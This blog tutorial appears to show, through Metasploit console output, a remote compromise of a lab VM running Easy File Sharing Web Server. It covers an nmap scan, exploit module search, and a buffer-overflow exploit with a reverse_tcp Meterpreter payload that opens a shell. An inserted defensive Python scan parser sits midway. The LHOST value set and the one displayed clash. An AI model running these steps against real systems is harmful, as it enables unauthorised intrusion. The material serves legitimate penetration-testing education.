8/07/2017

[MAD-METASPLOIT] 0x20 - Remote Exploit

HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00072s latency).
[*] Nmap: Not shown: 983 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 80/tcp    open  http
[*] Nmap: 135/tcp   open  msrpc
[*] Nmap: 139/tcp   open  netbios-ssn
[*] Nmap: 443/tcp   open  https
[*] Nmap: 445/tcp   open  microsoft-ds
[*] Nmap: 554/tcp   open  rtsp
[*] Nmap: 2869/tcp  open  icslap
[*] Nmap: 5357/tcp  open  wsdapi
[*] Nmap: 5500/tcp  open  hotline
[*] Nmap: 5800/tcp  open  vnc-http
[*] Nmap: 5900/tcp  open  vnc
..snip..

Among the nmap results, port 80 (usually a web service) looks like it needs a closer look.

HAHWUL > services 

Services
========

host            port   proto  name          state     info
----            ----   -----  ----          -----     ----
192.168.56.101  23     tcp    telnet        filtered
192.168.56.101  80     tcp    http          open    
192.168.56.101  135    tcp    msrpc         open    
192.168.56.101  137    udp    netbios       open      HAHWUL:<00>:U :WORKGROUP:<00>:G :HAHWUL:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U : __MSBROWSE__ :<01>:G :08:00:27:69:14:ff
192.168.56.101  139    tcp    netbios-ssn   open    
192.168.56.101  443    tcp    https         open    
192.168.56.101  445    tcp    microsoft-ds  open    
192.168.56.101  554    tcp    rtsp          open    
192.168.56.101  2869   tcp    icslap        open    
192.168.56.101  5357   tcp    wsdapi        open    
192.168.56.101  5500   tcp    hotline       open    
192.168.56.101  5800   tcp    vnc-http      open    
192.168.56.101  5900   tcp    vnc           open      VNC protocol version [3, 4].8
192.168.56.101  10243  tcp    unknown       open    
192.168.56.101  49152  tcp    unknown       open    
192.168.56.101  49153  tcp    unknown       open    
192.168.56.101  49154  tcp    unknown       open    
192.168.56.101  49155  tcp    unknown       open    
192.168.56.101  49156  tcp    unknown       open    

Using NSE to pull more detailed information about that port..

HAHWUL > db_nmap --script=default -p 80 192.168.56.101
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST
[*] Nmap: Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
[*] Nmap: NSE Timing: About 99.07% done; ETC: 15:20 (0:00:00 remaining)
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds

It is running Easy File Sharing Web Server. That server has a fair number of public vulnerabilities, and a quick search will turn up plenty of material on them.
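From a defender's side, the same scan output is the raw material for an exposure check: parse the `[*] Nmap:` lines that msfconsole echoes, pull out open ports and the `http-title` banner, and flag any host advertising software that is known to have public exploit modules. This is an added example, not code from the original post; the scan text is a constructed sample modelled on the output above, and the watchlist is an assumption seeded with the one product this page identifies.

```python
import re

# Constructed sample, modelled on the msfconsole db_nmap output shown on the page.
SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.00051s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server
[*] Nmap: 5900/tcp open  vnc
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
"""

# Assumed watchlist: lowercase banner fragments of software with public exploit
# modules, mapped to a short note for the finding.
WATCHLIST = {"easy file sharing": "Easy File Sharing Web Server (public overflow exploits)"}

HOST_RE = re.compile(r"Nmap scan report for (\S+)")
PORT_RE = re.compile(r"(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
TITLE_RE = re.compile(r"\|_http-title:\s*(.*)")


def parse_scan(text):
    """Turn msfconsole-style db_nmap output into {host: [port records]}."""
    hosts, current, last = {}, None, None
    for raw in text.splitlines():
        line = raw.replace("[*] Nmap:", "", 1).strip()  # drop the msfconsole prefix
        if m := HOST_RE.search(line):
            current, last = m.group(1), None
            hosts[current] = []
        elif current and (m := PORT_RE.match(line)):
            last = {"port": int(m.group(1)), "proto": m.group(2),
                    "state": m.group(3), "service": m.group(4), "title": ""}
            hosts[current].append(last)
        elif last and (m := TITLE_RE.match(line)):
            last["title"] = m.group(1).strip()  # NSE script line belongs to previous port
    return hosts


def exposed_findings(hosts):
    """Return (host, port, note) for open ports whose banner matches the watchlist."""
    findings = []
    for host, ports in hosts.items():
        for p in ports:
            if p["state"] != "open":
                continue
            banner = p["title"].lower()
            findings.extend((host, p["port"], note)
                            for needle, note in WATCHLIST.items() if needle in banner)
    return findings


if __name__ == "__main__":
    for host, port, note in exposed_findings(parse_scan(SAMPLE_SCAN)):
        print(f"{host}:{port} -> {note}")
```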

Let's look it up directly in Metasploit.

HAHWUL > search easyfilesharing

Matching Modules
================

   Name                                       Disclosure Date  Rank     Description
   ----                                       ---------------  ----     -----------
   exploit/windows/ftp/easyfilesharing_pass   2006-07-31       average  Easy File Sharing FTP Server 2.0 PASS Overflow
   exploit/windows/http/easyfilesharing_post  2017-06-12       normal   Easy File Sharing HTTP Server 7.2 POST Buffer Overflow
   exploit/windows/http/easyfilesharing_seh   2015-12-02       normal   Easy File Sharing HTTP Server 7.2 SEH Overflow

As of now, three modules come up. All three are overflow vulnerabilities that allow a shell to be obtained remotely.
After picking whichever one you like..

HAHWUL > use exploit/windows/http/easyfilesharing_post 
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  80               yes       The target port (TCP)
Exploit target:

   Id  Name
   --  ----
   0   Easy File Sharing 7.2 HTTP

Now for the configuration.

HAHWUL exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
HAHWUL exploit(easyfilesharing_post) > set LHOST  192.168.56.101
LHOST =>  192.168.56.101
HAHWUL exploit(easyfilesharing_post) > set LPORT 4646
HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.56.101   yes       The target address
   RPORT  80               yes       The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST      192.168.56.100     yes       The listen address
   LPORT     4646             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Easy File Sharing 7.2 HTTP

Running the exploit..

HAHWUL exploit(easyfilesharing_post) > exploit -z

[*] Started reverse TCP handler on  192.168.56.100:4646
[*] Sending stage (956991 bytes) to  192.168.56.101
[*] Meterpreter session 1 opened ( 192.168.56.100:4646 ->  192.168.56.101:38258) at 2017-08-07 15:24:33 +0900
[*] Session 1 created in the background.
HAHWUL exploit(easyfilesharing_post) > sessions -l

Active sessions
===============

  Id  Type                     Information                         Connection
  --  ----                     -----------                         ----------
  1   meterpreter x86/windows  HAHWUL\Virtualbox @ HAHWUL   192.168.56.100:4646 ->  192.168.56.101:38258 (192.168.56.101)

A meterpreter shell has arrived as a session, which means the attack succeeded as expected.

HAHWUL exploit(easyfilesharing_post) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > 
meterpreter > 

This is how a remote exploit plays out.

HAHWUL

Security engineer, Gopher and H4cker!